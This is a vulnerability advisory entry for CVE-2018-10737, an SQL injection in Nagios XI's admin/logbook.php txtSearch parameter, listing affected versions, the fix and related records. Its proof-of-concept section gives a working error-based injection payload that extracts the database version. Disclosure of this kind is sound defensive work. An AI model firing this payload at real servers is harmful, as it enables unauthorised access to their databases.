Lucene search
KnownsecSSV:97267HistoryMay 04, 2018 - 12:00 a.m.
NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737)
2018-05-0400:00:00
Knownsec
www.seebug.org
52
0.037 Low
EPSS
Percentile
91.8%
NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737)
Description
A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter.
Affected Version
- Nagios XI 5.2.x
- Nagios XI 5.4.x before 5.4.13
Proof of concept
http://xxxx/nagiosql/admin/logbook.php
postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Fix
Upgrade to version 5.4.13
Related
cvelist
cvelist
CVE-2018-10737
2018-05-16 13:00:00
nvd
nvd
CVE-2018-10737
2018-05-16 13:29:00
prion
prion
Sql injection
2018-05-16 13:29:00
ubuntucve
ubuntucve
CVE-2018-10737
2018-05-16 00:00:00
cve
cve
CVE-2018-10737
2018-05-16 13:29:00
nuclei
nuclei
NagiosXI <= 5.4.12 logbook.php SQL injection
2024-04-02 04:22:02
openvas
openvas
Nagios XI Multiple Vulnerabilities (Apr 2018) - Active Check
2018-04-27 00:00:00